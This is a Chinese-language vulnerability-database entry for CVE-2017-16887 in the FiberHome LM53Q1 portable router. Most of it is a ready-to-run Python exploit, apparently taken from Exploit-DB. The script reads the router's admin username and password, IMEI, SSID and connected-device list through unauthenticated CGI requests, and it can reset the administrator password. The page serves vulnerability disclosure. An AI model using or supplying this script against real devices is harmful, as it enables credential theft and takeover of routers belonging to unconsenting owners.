FiberHome Mobile WIFI Device LM53Q1 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1131779 漏洞类型
发布时间 2018-01-08 更新时间 2019-09-02
CVE编号 CVE-2017-16887 CNNVD-ID CNNVD-201711-804
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2018010078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201711-804
|漏洞详情
FiberHome Mobile WIFI Device LM53Q1是中国烽火(FiberHome)公司的一款便携式路由器设备。 FiberHome Mobile WIFI Device LM53Q1 VH519R05C01S38版本中的portal存在安全漏洞。攻击者可利用该漏洞获取WLAN密钥/密码。
|漏洞EXP
#!/usr/bin/python

# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
# Exploit Author: Ibad Shah
# Vendor Homepage: www.fiberhome.com
# Version: VH519R05C01S38
# Tested on: Linux
# Platform : Hardware
# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC

import requests,sys,getopt,socket,struct

#Declaring IP as our global variable to probe for Gateway IP of Device
global ip

#Getting Gateway IP Address
def get_default_gateway_linux():
    with open("/proc/net/route") as fh:
        for line in fh:
            fields = line.strip().split()
            if fields[1] != '00000000' or not int(fields[3], 16) & 2:
                continue
            return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
	return;


ip = get_default_gateway_linux()

exploit_title =  "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";


#Function to get Device Statistics 
def get_device_details():

	gateway = None
	hardware = None
	device_name = None
	devices_all = ''
	version = None
	gateway = None
	ssid = ''
	dns1 = None
	dns2 = None


	requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
	api_response = requestStatus.content.replace('\t','').split('\n')
	for results in api_response:
        	if "<hardware_version>" in results:
                	hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
        	if "<device_name>" in results:
                	device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
        	if "<version_num>" in results:
                	version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
        	if "<gateway>" in results:
                	gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
        	if "<ssid>" in results:
                	ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
        	if "<dns1>" in results:
                	dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
        	if "<dns2>" in results:
                	dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
        	if "<IMEI>" in results:
                	imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
                	print "\n=============================================="

                	print "\nHardware Version of Device : "+hardware+"\n"
                	print "\nName of Device : "+device_name+"\n"
               		print "\nSoftware Version of Device : "+version+"\n"
               		print "\nIMEI of Device! : "+imei+"\n"
              		print "\nWiFi SSID of Device : "+ssid+"\n"
	                print "\nGateway of Zong Device : "+gateway+"\n"
              		print "\nDNS Primary of Device : "+dns1+"\n"
		        print "\nDNS Secondary of Device : "+dns2+"\n"
	                print "\n=============================================================================\n";
	        if "<known_devices_list>" in results:
               		devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
               		print "\nConnected Devices to WIFI\n"
               		print devices_all


#Function for getting User Account Details to login to Portal
def get_user_account_details():
	request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin")
	admin_details = request.content.replace('\t','').split('\n')
	for admin_login_response in admin_details:
        	if "<router_username>" in admin_login_response:
                	username = admin_login_response.replace('<router_username>','').replace('</router_username>','')
        	if "<router_password>" in admin_login_response:
                	password = admin_login_response.replace('<router_password>','').replace('</router_password>','')
                	print "\nUsername of Device Web Application :\n"+username+" "
                	print "Password of Device Web Application :\n"+password+"\n"
                	print "\n=============================================================================\n";


#Function to change Administrator Password 

def change_admin_password():
	set_password = raw_input("\nEnter Password to Change : ")
	password = str(set_password)
	xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>"
	headers = {'Content-Type': 'application/xml'} 
	change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text
	print "Password Changed!"


def main():

	print exploit_title
	print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"

	get_option = raw_input("\n Enter Option :  ");

	option = int(get_option)

	if get_option == "1":

        	get_user_account_details()

        	raw_input("\n Press Any Key To Exit");

	elif get_option == "2":

        	get_device_details()

        	raw_input("\n Press Any Key To Exit");

	elif get_option == "3":

		change_admin_password()

	elif get_option == "":

		print "Good Bye!";

	else:

		print "Goodbye!";

main()
|参考资料

来源:FULLDISC
链接:http://seclists.org/fulldisclosure/2018/Jan/28
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/43460/